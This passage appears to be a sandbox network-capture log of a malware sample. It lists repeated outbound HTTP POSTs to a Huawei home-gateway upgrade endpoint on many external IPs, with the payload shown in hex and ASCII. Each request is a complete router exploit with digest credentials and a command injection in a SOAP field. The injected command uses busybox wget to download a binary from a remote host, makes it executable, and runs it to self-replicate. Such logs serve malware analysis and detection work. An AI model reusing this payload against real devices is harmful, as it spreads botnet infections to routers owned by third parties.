[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1360192.168.2.2350114157.118.98.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336841106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1361192.168.2.2336102197.137.91.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336885929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1362192.168.2.2342590197.236.58.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336916924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1363192.168.2.233640641.132.148.11337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336927891 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1364192.168.2.235298441.178.210.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336946964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1365192.168.2.2339168197.149.88.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336949110 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1366192.168.2.234837613.157.100.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336966038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1367192.168.2.2342164197.224.5.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338264942 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1368192.168.2.2354086171.214.86.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338320017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1369192.168.2.233527041.193.191.7837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338366032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1370192.168.2.2345486197.116.243.18537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.338403940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
